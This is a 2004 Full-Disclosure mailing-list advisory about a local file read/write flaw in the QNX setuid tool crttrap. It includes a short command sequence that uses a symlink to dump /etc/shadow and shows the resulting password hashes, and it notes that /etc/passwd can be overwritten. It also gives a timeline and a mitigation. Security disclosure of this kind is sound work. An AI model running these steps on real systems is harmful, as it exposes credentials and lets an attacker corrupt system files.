[Full-Disclosure] QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]

From: Julio Cesar Fort (julio_at_rfdslabs.com.br)
Date: 12/29/04

  • Next message: GuidoZ: "Re: [Full-Disclosure] Suspect phpBB users" 
    Date: Tue, 28 Dec 2004 23:27:37 -0000
To: full-disclosure@lists.netsys.com

    *** rfdslabs security advisory ***

    Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
    Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
    Vendor: http://www.qnx.com
    Date: Dec 11 2004

    Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

    1. Introduction

    crrtrap is a tool to detect video hardware and starts the correct driver for
    QNX.

    2. Details

    crttrap has a '-c' flag to specify where trap file will be written. Combined
    with 'trap' flag it is possible to read/write any file in the disk.

    By default crttrap writes and read trap files in "/etc/system/config". Once
    this directory is owned by root we don't have permission to write. It
    filters "../" to prevent directory transversal vulnerabilities. In order to
    bypass this protection we noticed it doesn't check only for "/".
    This way is possible to make it create a sub directory, giving our group
    read and write priviledges. Now we are able to manipulate our trap file.

    $ crttrap -c tmp/rfdslabs trap
    /usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
    /usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
    crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
    $ cd /etc/system/config/tmp
    $ ls -la
    total 52
    drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
    drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
    -rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs

    $ rm -f rfdslabs
    $ ln -s /etc/shadow rfdslabs
    $ crttrap -c tmp/rfdslabs dump
    root:21QjUKxP9gEJK:0:0:0
    sandimas:91UzHxvt3x1n2:0:0:0

    We are also able to overwrite any file with 'trap' switch. As an example, an
    attacker can corrupt '/etc/passwd' and make login attempts fail
    everytime.
    See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

    PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in
    QNX 4.25. But his exploitation technique won't work with newest versions
    because crttrap opens "/etc/system/config" and its sub directories.

    3. Solution

    No official solution yet. We suggest remove crttrap suid bit until QNX don't
    release a patch.

    4. Timeline

    10 Dec 2004: Vulnerability detected;
    11 Dec 2004: Advisory written; rfdslabs contacts QNX;
    20 Dec 2004: QNX replies back rfdslabs;
    28 Dec 2004: Advisory released to public.

    Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
    Rodrigo Costa (NERV).

    www.rfdslabs.com.br - computers, sex, human mind, music and more
    Recife, PE, Brazil 

    --
Julio Cesar Fort (julio at rfdslabs com br)
Recife, PE, Brasil
www.rfdslabs.com.br - computers, sex, human mind, music and
more.
________________________________________________
Message sent using
UebiMiau 2.7.2
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
  • Next message: GuidoZ: "Re: [Full-Disclosure] Suspect phpBB users"